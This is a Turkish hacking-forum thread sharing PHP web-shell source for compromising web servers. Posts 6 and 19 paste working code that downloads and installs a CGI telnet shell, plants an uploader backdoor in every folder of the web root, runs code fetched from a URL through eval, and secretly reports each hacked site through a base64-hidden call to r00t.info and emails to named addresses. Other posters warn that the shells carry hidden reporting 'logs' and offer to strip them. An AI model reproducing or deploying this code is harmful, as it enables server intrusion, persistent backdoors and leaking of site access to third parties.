ln / cat bypass & cgi shell

Discussion in 'Hack Tools / Hack programları' started by WorthLess, Jul 16, 2017.

  1. Root Viper

    Root Viper

    Mesajlar:
    48
    Likes Received:
    1
  2. Mattrock

    Mattrock

    Mesajlar:
    9
    Likes Received:
    0
    eyvallah
     
  3. MartyTR

    MartyTR

    Mesajlar:
    254
    Likes Received:
    383
    arruuuu bu kadar kişi düştü mü tuzağa vaynasına :D r00t.info'nun shellerini kullanmayın kardeşim ben kodyum o logları (yanıltıcı log kodlarını atmışsınız hepiniz) :D tavsiye etmem hiç tavsiye etmem.
     
  4. Unbalanced

    Unbalanced Guest

    Olum adam root.infonun loguna düşse ne olur adam polisin loguna düştü aq.
     
    MartyTR likes this.
  5. sky

    sky BABA

    Mesajlar:
    732
    Likes Received:
    544
    eline saglik
     
  6. cavdar59

    cavdar59

    Mesajlar:
    682
    Likes Received:
    1,021
    loglu shel kullanmayın alın kodu açıp veriyorm alttaki logu temizleyin kullanın senderide temizlemeyi unutmayın


    <script src=Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım if(!file_exists('cgitelnt/fuhosin.xx')){ $dizin = 'Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım function dosya_indir($link,$name=null) { $link_info = pathinfo($link); $uzanti = strtolower($link_info['extension']); $file = ($name) ? $name.'.'.$uzanti : $link_info['basename']; $curl = curl_init($link); $fopen = fopen($file,'w'); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0); curl_setopt($curl, CURLOPT_FILE, $fopen); curl_exec($curl); curl_close($curl); fclose($fopen); } dosya_indir($dizin, "cgitelnet"); $zip = new ZipArchive(); $file = 'cgitelnet.zip'; $zip->open($file); $cikar = $zip->extractTo('cgitelnt/'); chmod('cgitelnt/fuhosin.xx', 0755); if(file_exists('cgitelnet.zip')){ @unlink('cgitelnet.zip'); } if($cikar and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password: <strong>r00t.info1</strong><br>"; echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";} else{ echo '<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>'; } } elseif(file_exists('cgitelnt/fuhosin.xx') and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password:<strong>r00t.info1</strong><br>"; chmod('cgitelnt/fuhosin.xx', 0755); echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>"; } ?>
    <?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?>
    <?php @session_start(); @error_reporting(0); $a = '<?php
    session_start();
    if($_SESSION["adm"]){
    echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!</b><br><br>\'; }}
    }
    if($_POST["p"]){
    $p = $_POST["p"];
    $pa = md5(sha1($p));
    if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
    $_SESSION["adm"] = 1;
    }
    }
    ?>
    <form action="" method="post">
    <input type="text" name="p">
    </form>
    '; if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"]; $pa = md5(sha1($p)); if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"])); } } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = ''.$doc.'/.'; $d2 = ''.$doc.'/..'; if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir,$doc); foreach($dir as $d){ $p = $doc."/".$d; if(is_dir($p)){ $file = $p."/newsr.php"; @touch($file); $folder = @fopen($file,"w"); @fwrite($folder,$a); } } $lls = $_SERVER["HTTP_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım $brow = urlencode($_SERVER['HTTP_USER_AGENT']); $retValue = file_get_contents(base64_decode("aHR0cDovL3IwMHQuaW5mby95YXoucGhwP2E=")."=".$lld.base64_decode("JmI=")."=".$brow); echo $retValue; @$_SESSION["sdm"]=1; } ?>


    <?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } } $datasi=@fopen("../modules/indexx.php",'r'); if($datasi){ }else{ @mkdir("modules"); $dos = file_get_contents("Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım"); $data = "../modules/indexx.php"; @touch ("../modules/indexx.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header); } ?>

    <?php $kime = "byhero44@gmail.com"; $baslik = "r00t.info Server Avcisi V1.0"; $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n"; $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n"; $EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n"; $EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n"; $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n"; mail($kime, $baslik, $EL_MuHaMMeD); ?>
     
  7. MKA7

    MKA7 Closed

    Mesajlar:
    692
    Likes Received:
    1,267
    bakalım
     
  8. MKA7

    MKA7 Closed

    Mesajlar:
    692
    Likes Received:
    1,267
    Decode edilmiş hali aşağıdadır bunu paylaş istersen. Logları silmedim


    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
     
    Unbalanced and HackNology like this.
  9. BoneLess

    BoneLess At hırsızı

    Mesajlar:
    596
    Likes Received:
    693
    hortmu :d
     
  10. MKA7

    MKA7 Closed

    Mesajlar:
    692
    Likes Received:
    1,267
    Yeni geldim ya ne var ne yok diye bir göz gezdiriyorum forumda :d
     
    BoneLess likes this.
  11. HackNology

    HackNology Jesse Pinkman Bitch :)

    Mesajlar:
    1,128
    Likes Received:
    1,053
    sorry beyler lazım
     
  12. Unlovable

    Unlovable Forumda KRAL

    Mesajlar:
    118
    Likes Received:
    164
    ulan 1 yıl sonra kendimden yardım alacağım hiç aklıma gelmezdi sağol knk.
     
  13. sky

    sky BABA

    Mesajlar:
    732
    Likes Received:
    544
    anlamadım?
     
  14. Unbalanced

    Unbalanced Guest

    Konuyu açan bu arkadaş çee
     
  15. Unlovable

    Unlovable Forumda KRAL

    Mesajlar:
    118
    Likes Received:
    164
    worthless benim eski nick kanka.
     
  16. sky

    sky BABA

    Mesajlar:
    732
    Likes Received:
    544
    öyle bir yorum atmışki sabahtan beri olayı çözmeye çalışıyorum çee
     
  17. vaykaa.gov

    vaykaa.gov

    Mesajlar:
    151
    Likes Received:
    101
    teşekkürler
     
  18. Nogay

    Nogay

    Mesajlar:
    559
    Likes Received:
    554
    bakalim
     
  19. Nogay

    Nogay

    Mesajlar:
    559
    Likes Received:
    554
    loglu
    <script src=Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım></script>
    <?php if(!file_exists('cgitelnt/fuhosin.xx')){ $dizin = 'Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
    function dosya_indir($link,$name=null) { $link_info = pathinfo($link);
    $uzanti = strtolower($link_info['extension']);
    $file = ($name) ? $name.'.'.$uzanti : $link_info['basename'];
    $curl = curl_init($link);
    $fopen = fopen($file,'w');
    curl_setopt($curl, CURLOPT_HEADER,0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
    curl_setopt($curl, CURLOPT_FILE, $fopen);
    curl_exec($curl);
    curl_close($curl);
    fclose($fopen);
    } dosya_indir($dizin, "cgitelnet");
    $zip = new ZipArchive();
    $file = 'cgitelnet.zip';
    $zip->open($file);
    $cikar = $zip->extractTo('cgitelnt/');
    chmod('cgitelnt/fuhosin.xx', 0755);
    if(file_exists('cgitelnet.zip')){ @unlink('cgitelnet.zip');
    } if($cikar and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password: <strong>r00t.info1</strong><br>";
    echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
    } else{ echo '<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>';
    } } elseif(file_exists('cgitelnt/fuhosin.xx') and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password:<strong>r00t.info1</strong><br>";
    chmod('cgitelnt/fuhosin.xx', 0755);
    echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
    }
    ?>

    <?php @session_start();
    @error_reporting(0);
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @ini_set('display_errors', 0);
    @ini_set('output_buffering',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);

    ?>

    <?php @session_start();
    @error_reporting(0);
    $a = '
    <?php
    session_start();

    if($_SESSION["adm"]){
    echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';
    echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';
    echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
    if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\';
    } else { echo \'<b>Upload Fail !!!</b><br><br>\';
    }}
    }
    if($_POST["p"]){
    $p = $_POST["p"];

    $pa = md5(sha1($p));

    if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
    $_SESSION["adm"] = 1;

    }
    }

    ?>
    <form action="" method="post">
    <input type="text" name="p">
    </form>
    ';
    if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"];
    $pa = md5(sha1($p));
    if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"]));
    } } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"];
    $dir = scandir($doc);
    $d1 = ''.$doc.'/.';
    $d2 = ''.$doc.'/..';
    if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]);
    } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]);
    } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]);
    } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]);
    } @array_push($dir,$doc);
    foreach($dir as $d){ $p = $doc."/".$d;
    if(is_dir($p)){ $file = $p."/newsr.php";
    @touch($file);
    $folder = @fopen($file,"w");
    @fwrite($folder,$a);
    } } $lls = $_SERVER["HTTP_HOST"];
    $llc = $_SERVER["REQUEST_URI"];
    $lld = 'Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
    $brow = urlencode($_SERVER['HTTP_USER_AGENT']);
    $retValue = file_get_contents(base64_decode("aHR0cDovL3IwMHQuaW5mby95YXoucGhwP2E=")."=".$lld.base64_decode("JmI=")."=".$brow);
    echo $retValue;
    @$_SESSION["sdm"]=1;
    }
    ?>



    <?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query']));
    $data = "data.txt";
    @touch ("data.txt");
    $ver = @fopen ($data , 'w');
    @fwrite ( $ver , $veriyfy ) ;
    @fclose ($ver);
    }else{ $datas=@fopen("data.txt",'r');
    $i=0;
    while ($i <= 5) { $i++;
    $blue=@fgets($datas,1024);
    echo $blue;
    } } $datasi=@fopen("../modules/indexx.php",'r');
    if($datasi){ }else{ @mkdir("modules");
    $dos = file_get_contents("Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım");
    $data = "../modules/indexx.php";
    @touch ("../modules/indexx.php");
    $ver = @fopen ($data , 'w');
    @fwrite ( $ver , $dos ) ;
    @fclose ($ver);
    $yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."";
    $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>';
    $header .= "From: SheLL Boot <suppor@nic.org>\n";
    $header .= "Content-Type: text/html;
    charset=utf-8\n";
    @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);
    @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header);
    }
    ?>


    <?php $kime = "byhero44@gmail.com";
    $baslik = "r00t.info Server Avcisi V1.0";
    $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
    $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
    $EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
    $EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
    $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
    mail($kime, $baslik, $EL_MuHaMMeD);

    ?>
     
    Hector likes this.
Loading...